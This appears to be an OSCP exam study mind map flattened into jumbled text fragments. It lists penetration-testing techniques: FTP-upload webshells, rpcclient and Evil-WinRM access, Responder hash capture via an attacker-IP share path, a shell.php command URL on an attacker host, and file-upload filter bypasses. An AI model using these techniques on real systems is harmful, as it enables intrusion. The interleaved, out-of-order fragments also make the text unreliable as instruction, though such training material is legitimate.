Guide To OSCP in 2021
Guide To OSCP in 2021
Guide To OSCP in 2021
Anonymous Login
Possible Filewrite to access through Web
File Write
21/FTP FTP to file upload ==> Execute from web == webshell
USERname Enumaration
135/RPC rpcclient -U '%' -N <IP>
Tool RPCCLIENT
With Password
5985|5986/WINRM/S Remotly Windows Machine Access Evil-Winrm(Tool)
With Hash
Webshell Writing in Web-Hosting Directory To Find WebHosting Directory Use LFI list
TO SHELL FILE Pemission
For Windows use \\<Attacker IP>\
sharename\anyfilename to get hash for Responder tool
the user
Oneliner Priority
b374k
1) Check low privilege Shell permission ( Webshells which can be used
whoami /priv) and try exploiting vuln X Oneliner Priority
3) Check for Weak permissions in services To Get Information about Databases, Find Username password & try same with
and its binpath Manual Approaches Tables other services like ssh,winrm,etc
http://<Attacker_IP>:<PORT>/shell.php&
payload should be cmd=whoami
? And & makes a huge diffrence
TIPS
http://<Attacker_IP>:<PORT>/shell.php?
payload should not be cmd=whoami
oneliner
p0wny
shells
b374k
meterpreter
php.gif
WIndows IIS & Apacher httpd
Similar extensions php/php4/php5/phtml
bypasses
If data sends file size param modify value
to something which is higer
File Size check (client check only)
use oneliner or smaller shells
image/png
image/gif
text/plain
asp/aspx image/png
Windows IIS server
Content type Check Intercept request through burp image/jpeg
image/gif
Bypasses text/plain
Source Code
Comments
validate first
Exploiting follow earlier topic checks and validation
use right port to get LAN shell